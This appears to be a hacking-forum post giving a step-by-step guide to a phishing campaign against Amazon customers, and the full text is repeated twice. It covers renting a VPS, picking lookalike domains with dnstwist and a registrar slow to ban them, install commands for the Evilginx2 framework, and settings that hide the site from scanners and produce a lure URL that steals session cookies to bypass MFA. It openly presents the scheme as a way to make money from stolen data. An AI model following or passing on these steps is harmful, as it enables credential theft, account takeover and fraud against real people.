colbyburgess
Legendary
- Joined
- Feb 16, 2024
- Posts
- 36
- Reaction score
- 0
- Status
- Offline
- Last Seen
Hello, I'm going to start by saying that this can either:
A. Make you a lot of money, or
B. Depending on what you do with the stolen data, you could face jail time.
Step 1: Get a server.
The first step in any phishing campaign is to get a cheap VPS to host your page. There are numerous providers out there. Choose Debian as your operating system; it will work best for this.
Step 2: Register a phishing domain.
To find out what some phishing domains are, I recommend installing dnstwist on a Kali machine and running the domain of the site you're attacking through it to see what's available. I recommend buying your domain from Namecheap because they have reasonable prices and will not ban it quickly, which is always a plus.
Step 3 (time to type): Install Evilginx2
First and foremost, Evilginx2 is a MiTM phishing framework that also steals session cookies, which can be used to circumvent MFA.
To install this, run the following:
bash
Copy code
sudo apt update
sudo apt install wget -y
wget https://golang.org/dl/go1.17.linux-amd64.tar.gz
sudo tar -zxvf go1.17.linux-amd64.tar.gz -C /usr/local
echo "export PATH=/usr/local/go/bin:${PATH}" | sudo tee /etc/profile.d/go.sh
source /etc/profile.d/go.sh
git clone https://github.com/BakkerJan/evilginx2.git
cd evilginx2
make
sudo make install
sudo evilginx
Step 4: Create a Page.
After running. You will see a list of pages that are all disabled; choose your page of choice, but first we need to configure Evilginx so that we don't have problems.
Configure domain: <yourdomain>
Configure IP <yourIP>
blacklist unauth
The blacklist command is used to protect your site from scanners. You want to do this.
Next, choose your preferred phishlet (phishing page).
Phishlets hostname: Amazon <your domain name>.
Phishlets enable Amazon.
Now it's time to set up our lure for this website. This is the actual phishing page.
Create Amazon lures and edit the redirect URL to https://amazon.com.
Lures get-url 0
After running lures get-url 0, you should see a link appear on the screen, which is your phishing URL.
A. Make you a lot of money, or
B. Depending on what you do with the stolen data, you could face jail time.
Step 1: Get a server.
The first step in any phishing campaign is to get a cheap VPS to host your page. There are numerous providers out there. Choose Debian as your operating system; it will work best for this.
Step 2: Register a phishing domain.
To find out what some phishing domains are, I recommend installing dnstwist on a Kali machine and running the domain of the site you're attacking through it to see what's available. I recommend buying your domain from Namecheap because they have reasonable prices and will not ban it quickly, which is always a plus.
Step 3 (time to type): Install Evilginx2
First and foremost, Evilginx2 is a MiTM phishing framework that also steals session cookies, which can be used to circumvent MFA.
To install this, run the following:
bash
Copy code
sudo apt update
sudo apt install wget -y
wget https://golang.org/dl/go1.17.linux-amd64.tar.gz
sudo tar -zxvf go1.17.linux-amd64.tar.gz -C /usr/local
echo "export PATH=/usr/local/go/bin:${PATH}" | sudo tee /etc/profile.d/go.sh
source /etc/profile.d/go.sh
git clone https://github.com/BakkerJan/evilginx2.git
cd evilginx2
make
sudo make install
sudo evilginx
Step 4: Create a Page.
After running. You will see a list of pages that are all disabled; choose your page of choice, but first we need to configure Evilginx so that we don't have problems.
Configure domain: <yourdomain>
Configure IP <yourIP>
blacklist unauth
The blacklist command is used to protect your site from scanners. You want to do this.
Next, choose your preferred phishlet (phishing page).
Phishlets hostname: Amazon <your domain name>.
Phishlets enable Amazon.
Now it's time to set up our lure for this website. This is the actual phishing page.
Create Amazon lures and edit the redirect URL to https://amazon.com.
Lures get-url 0
After running lures get-url 0, you should see a link appear on the screen, which is your phishing URL.